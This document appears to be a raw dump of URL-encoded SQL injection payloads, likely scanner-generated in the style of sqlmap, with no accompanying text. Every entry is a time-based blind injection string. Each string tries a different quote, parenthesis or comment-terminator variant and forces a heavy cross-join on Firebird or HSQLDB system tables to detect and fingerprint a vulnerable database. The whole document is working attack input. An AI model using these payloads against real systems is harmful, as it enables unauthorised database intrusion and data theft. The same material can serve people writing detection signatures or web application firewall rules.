1%27%20IN%20BOOLEAN%20MODE%29%20AND%202558%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%23 1%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%29%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%29%20WHERE%206094%3D6094%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%20WHERE%204755%3D4755%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%25%27%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%25%27%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%25%27%29%29%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%25%27%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%00%27%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%00%27%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%29%20WHERE%203006%3D3006%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%29%20WHERE%203639%3D3639%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%20WHERE%208114%3D8114%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%22%20WHERE%205861%3D5861%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%7C%7C%28SELECT%20%27PGbf%27%20FROM%20DUAL%20WHERE%208315%3D8315%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%7C%7C%28SELECT%20%27YUDZ%27%20WHERE%203363%3D3363%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%2B%28SELECT%20VRYN%20WHERE%204698%3D4698%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%2B%28SELECT%20%27qgMA%27%20WHERE%207134%3D7134%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205713%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%281771%3D1771 1%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%289361%3D9361 1%29%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%286760%3D6760 1%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1%29%20WHERE%209915%3D9915%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1%20WHERE%206959%3D6959%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1%27%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1%27%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1%22%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1%27%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27XKJV%27%3D%27XKJV 1%27%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27cmwb%27%3D%27cmwb 1%27%29%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27rofO%27%3D%27rofO 1%27%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27vaCL%27%3D%27vaCL 1%27%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27xuRF%27%20LIKE%20%27xuRF 1%27%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27COyY%27%20LIKE%20%27COyY 1%27%29%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27agKR%27%20LIKE%20%27agKR 1%27%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27ZoiR%27%20LIKE%20%27ZoiR 1%22%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22LuqG%22%3D%22LuqG 1%22%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22jfjC%22%3D%22jfjC 1%22%29%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22UCQW%22%3D%22UCQW 1%22%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22VDpP%22%3D%22VDpP 1%22%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22ApEl%22%20LIKE%20%22ApEl 1%22%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22Hjkx%22%20LIKE%20%22Hjkx 1%22%29%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22oUPu%22%20LIKE%20%22oUPu 1%22%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22DrQJ%22%20LIKE%20%22DrQJ 1%25%27%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27mVSc%27%3D%27mVSc 1%00%27%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27spVg%27%3D%27spVg 1%27%29%20WHERE%201954%3D1954%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1%22%29%20WHERE%205235%3D5235%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1%27%20WHERE%204922%3D4922%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1%22%20WHERE%208244%3D8244%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1%27%7C%7C%28SELECT%20%27nwba%27%20FROM%20DUAL%20WHERE%204754%3D4754%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27RlpV%27%20WHERE%202738%3D2738%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%7C%7C%27 1%27%2B%28SELECT%20Igyk%20WHERE%206281%3D6281%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%2B%27 1%27%2B%28SELECT%20%27rQXv%27%20WHERE%204328%3D4328%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205102%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%23 1%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%29%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%29%20WHERE%203510%3D3510%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%20WHERE%202763%3D2763%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%29%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%25%27%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%25%27%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%25%27%29%29%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%25%27%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%00%27%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%00%27%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 